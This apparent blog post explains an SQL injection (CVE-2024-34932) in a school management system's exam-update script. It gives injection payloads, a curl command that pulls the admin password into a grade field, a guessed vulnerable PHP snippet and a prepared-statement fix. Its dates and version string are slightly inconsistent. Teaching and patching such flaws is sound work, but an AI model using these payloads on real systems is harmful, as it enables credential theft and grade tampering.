CVE-2024-34932 - How a Simple SQL Injection Can Hack Your School Management System

On June 2024, CVE-2024-34932 was publicly disclosed, uncovering a critical SQL injection flaw in a popular educational product: Campcodes Complete Web-Based School Management System v1.. This post explains in simple terms how the vulnerability works, shows step-by-step exploitation (with code), and gives references for further reading.

What Is the Vulnerability?

CVE-2024-34932 is about a security gap found in the file /model/update_exam.php. This script handles updating exam records in the system. Unfortunately, it does NOT properly clean the data sent in through the name parameter. That means: if you enter SQL code where a name is expected, the system’s database might just run your code!

Bottom Line: An attacker can send their own SQL to the server and make it do whatever they want with the data—read stuff, change grades, or even erase records.

A typical HTTP POST request to update an exam might look like this

POST /model/update_exam.php HTTP/1.1
Host: school.example.com
Content-Type: application/x-www-form-urlencoded

id=25&name=Final%20Science%20Exam

This should set the exam with id=25 to the new name.

2. Crafting A Malicious Payload

Because the name value is sent straight into a SQL query without cleaning, we can inject SQL commands.

Example payload

id=25&name=Hacked', result=(SELECT database()),'column

This payload *ends* the name value with ' (breaking out of the expected input), then runs SELECT database() as a side effect.

You can replicate this with curl (replace the URL with your own)

curl -X POST \
  -d "id=25&name=Hacked', grade=(SELECT password FROM users WHERE id=1)-- -" \
  http://school.example.com/model/update_exam.php

This tries to set the grade column for exam 25 to the admin's password (assuming users are numbered and using typical naming). The double hyphen (--) tells SQL to ignore the rest of the query.

The PHP file probably contains code like this (simplified)

$name = $_POST['name'];
$id = $_POST['id'];
$sql = "UPDATE exams SET name='$name' WHERE id='$id'";
mysqli_query($conn, $sql);

If $name contains malicious SQL, it gets executed.

ALWAYS use prepared statements or parameterized queries when working with databases in PHP

$stmt = $conn->prepare("UPDATE exams SET name=? WHERE id=?");
$stmt->bind_param("si", $name, $id);
$stmt->execute();

Official References

- CVE-2024-34932 — MITRE
- Product at Campcodes
- Exploit Database Listing (if/when available)
- OWASP SQL Injection Cheat Sheet

Final Words

CVE-2024-34932 is a textbook example of why you *never* stick user input directly into SQL. If your school, company, or customer uses Campcodes School Management System v1., you must patch this hole fast.

Remember: If you find a similar bug, always report it responsibly — and patch before someone less friendly finds it!

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 11/20/2024 16:35:19 UTC